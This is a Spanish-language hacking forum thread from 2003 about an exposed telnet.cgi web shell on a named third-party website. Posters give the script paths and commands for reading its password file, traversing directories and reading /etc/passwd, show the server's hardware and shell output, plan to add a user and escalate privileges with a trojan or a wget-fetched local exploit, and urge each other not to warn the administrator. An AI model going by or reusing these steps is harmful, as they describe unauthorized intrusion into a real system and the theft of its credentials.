elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
27 Mayo 2012, 21:53  


Tema destacado: Recuperar cuenta de Google, GMail, Youtube

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking Avanzado
| | |-+  Hacking Linux/Unix (Moderadores: kamsky, TRICKY, berz3k)
| | | |-+  Telnet.cgi exploit		 0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Telnet.cgi exploit  (Leído 4,227 veces)
EL_ZoRRo

Desconectado Desconectado

Mensajes: 234



Ver Perfil
Telnet.cgi exploit
« en: 18 Agosto 2003, 09:51 »
Aunque este texto lo visto ya hace un tiempo me parecio importante publicarlo para que conozcan este bug, los que no lo conocen .

Texto extraido de un pos de http://www.security-forums.com/


Telnet.cgi exploit

for the curious ...i mentioned this exploit in the exploits forum anyway tried it and here it is inc, a site example

related to the issue , so if your site is runnig the script , you could be at risk !!!

original article

http://www.jimtools.com/tools/telnet/


/telnet/telnet.cgi
/cgi-bin/telnet.cgi
/cgi-bin/telnet/telnet.cgi

==============================
example:

http://www.cumynet.com/cgi-bin/telnet.cgi

type in: ls

then

ls mastergatey

then

cat mastergatey/password.txt

you have the passwordlist


------------------------------------------------------------------------

El administrador de este sitio fue avisado pero lo ignoro.
El bug todavia funciona en el site pero no se si se puede obtener el paswordlist si alguno lo consique, me lo dice para saber , el servidor es unix y me gustaria que alguien me dijera los interpretes de comandos mas comunes para subir bajar modificar ejecutar algo en el server si es que se puede.
Un saludo
Espero que les sea util
En línea
dxr
Colaborador
***
Desconectado Desconectado

Mensajes: 2.991



Ver Perfil
Re:Telnet.cgi exploit
« Respuesta #1 en: 18 Agosto 2003, 17:01 »
j0der!!!!la ostia este bug como se llama???? pa buscar informacion en español!!!

es muy bueno.....

estoy probando cosas....

el miercoles intentare obtener una shell con los priviligios q corre el serv3er para luego intentar elevarlos atrves d eun troyano o algo....

no avises al admin xDDD q se joda!!!

comandos interesantes..... mmmmm pos nose....

dime q pretendes y te ayudo....

si sabes de alguna web con info en español me avisas sino pos dime el nomnre del bug....

y muchas gracias por la informacion....


 ;)
------------------------------------------------------------------------


00:00.0 Host bridge: Intel Corporation 440BX/ZX - 82443BX/ZX Host bridge (rev 03)
00:01.0 PCI bridge: Intel Corporation 440BX/ZX - 82443BX/ZX AGP bridge (rev 03)
00:07.0 ISA bridge: Intel Corporation 82371AB PIIX4 ISA (rev 02)
00:07.1 IDE interface: Intel Corporation 82371AB PIIX4 IDE (rev 01)
00:07.2 USB Controller: Intel Corporation 82371AB PIIX4 USB (rev 01)
00:07.3 Bridge: Intel Corporation 82371AB PIIX4 ACPI (rev 02)
00:0d.0 PCI bridge: Intel Corporation 80960RP [i960 RP Microprocessor/Bridge] (rev 03)
00:0d.1 I2O: Intel Corporation 80960RP [i960RP Microprocessor] (rev 03)
00:0f.0 Ethernet controller: 3Com Corporation 3c905B 100BaseTX [Cyclone] (rev 30)
01:00.0 VGA compatible controller: ATI Technologies Inc: Unknown device 475a (rev 7a)
 


xDDDDDDD

si metes este comando veras su directorio raiz....

ls ../../../../

es una redhat 6.1... el admin esta conectado al irc 61.6.39.100:6667

y voy a intentar crearme un usuario xDDDDD

usage: adduser[-u uid [-o]] [-g group] [-G group,...]
[-d home] [-s shell] [-c comment] [-m [-k template]]
[-f inactive] [-e expire ] [-p passwd] [-n] [-r] name
       adduser-D [-g group] [-b base] [-s shell]
[-f inactive] [-e expire ]
 
« Última modificación: 18 Agosto 2003, 17:11 por DEREK_X » En línea
Hacer preguntas concretas, claras y aportando toda la documentación necesaria.
De lo contrario, no tendreis una respuesta clara.
EL_ZoRRo

Desconectado Desconectado

Mensajes: 234



Ver Perfil
Re:Telnet.cgi exploit
« Respuesta #2 en: 19 Agosto 2003, 11:57 »
A mi parecer es una Vulnerabilidad CGI que se explota de la forma antes citada.
Y parece obtenerse algo parecido al unicode
Ademas el root es un idiota xDDDD por apateque posee
Buffer overflow in Sendmail 5.79 to 8.12.7
OpenSSH Challenge-Response Buffer Overflow

Y bueno habra que aprovecharlo
 
Ahora quiero ver si este bug se compruba en otro servidores, asi que voy a buscar server que tengan corriendo telnet
 
Un saludo
En línea
alkan

Desconectado Desconectado

Mensajes: 77


¿Creias q tus secretos estaban ocultos? Creias mal


Ver Perfil WWW
Re:Telnet.cgi exploit
« Respuesta #3 en: 19 Agosto 2003, 16:33 »
Al introducir el comando HELP en este Telnet:

GNU sh, version 1.14.7(1)
Shell commands that are defined internally.  Type `help' to see this list.
Type `help name' to find out more about the function `name'.
Use `info bash' to find out more about the shell in general.

A star (*) next to a name means that the command is disabled.

 %[DIGITS | WORD] [&]               . filename
 :                                  [ arg... ]
 alias [ name[=value] ... ]         bg [job_spec]
 bind [-lvd] [-m keymap] [-f filena break [n]
 builtin [shell-builtin [arg ...]]  case WORD in [PATTERN [| PATTERN].
 cd [dir]                           command [-pVv] [command [arg ...]]
 continue [n]                       declare [-[frxi]] name[=value] ...
 dirs [-l]                          echo [-neE] [arg ...]
 enable [-n] [name ...]             eval [arg ...]
 exec [ [-] file [redirection ...]] exit [n]
 export [-n] [-f] [name ...] or exp fc [-e ename] [-nlr] [first] [last
 fg [job_spec]                      for NAME [in WORDS ... ;] do COMMA
 function NAME { COMMANDS ; } or NA getopts optstring name [arg]
 hash [-r] [name ...]               help [pattern ...]
 history [n] [ [-awrn] [filename]]  if COMMANDS; then COMMANDS; [ elif
 jobs [-lnp] [jobspec ...] | jobs - kill [-s sigspec | -sigspec] [pid
 let arg [arg ...]                  local name[=value] ...
 logout                             popd [+n | -n]
 pushd [dir | +n | -n]              pwd
 read [-r] [name ...]               readonly [-n] [-f] [name ...] or r
 return [n]                         select NAME [in WORDS ... ;] do CO
 set [--abefhknotuvxldHCP] [-o opti shift [n]
 source filename                    suspend [-f]
 test [expr]                        times
 trap [arg] [signal_spec]           type [-all] [-type | -path] [name
 typeset [-[frxi]] name[=value] ... ulimit [-SHacdfmstpnuv [limit]]
 umask [-S] [mode]                  unalias [-a] [name ...]
 unset [-f] [-v] [name ...]         until COMMANDS; do COMMANDS; done
 variables - Some variable names an wait [n]
 while COMMANDS; do COMMANDS; done  { COMMANDS }

Que bello.........  :P
En línea
||||||||||||||||||||||||||||||
PoR uN BueN HaCKiNG eSPaÑoL
SiN FaSCiSMo DiGiTaL
alkan

Desconectado Desconectado

Mensajes: 77


¿Creias q tus secretos estaban ocultos? Creias mal


Ver Perfil WWW
Re:Telnet.cgi exploit
« Respuesta #4 en: 19 Agosto 2003, 16:38 »
Pufffffffffff.............. y al introducir el comando info bash ya no os quiero decir na..............
En línea
||||||||||||||||||||||||||||||
PoR uN BueN HaCKiNG eSPaÑoL
SiN FaSCiSMo DiGiTaL
Creature


Desconectado Desconectado

Mensajes: 1.773


Mitad bohemio, mitad caballero


Ver Perfil WWW
Re:Telnet.cgi exploit
« Respuesta #5 en: 20 Agosto 2003, 21:42 »
No es un bug, es un 'CGI malicioso', o sea un Exploit subido al servidor. Claro, los mejores exploits de este tipo estan en PHP. ;)

cat ../../../../../etc/passwd

Las contraseñas estan en el Shadow y con permisos de Apache (q son los q hay) no se puede leerlo.

Lo más lógico es buscar un directorio con permisos y hacer wget a algun exploit local para 'elevarse'.
En línea
Toma mi mano sigueme, te mostrare lo que tu alma no ve!
por equipaje solo lleva tu fé, por escudero el valor sieempree teen!
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines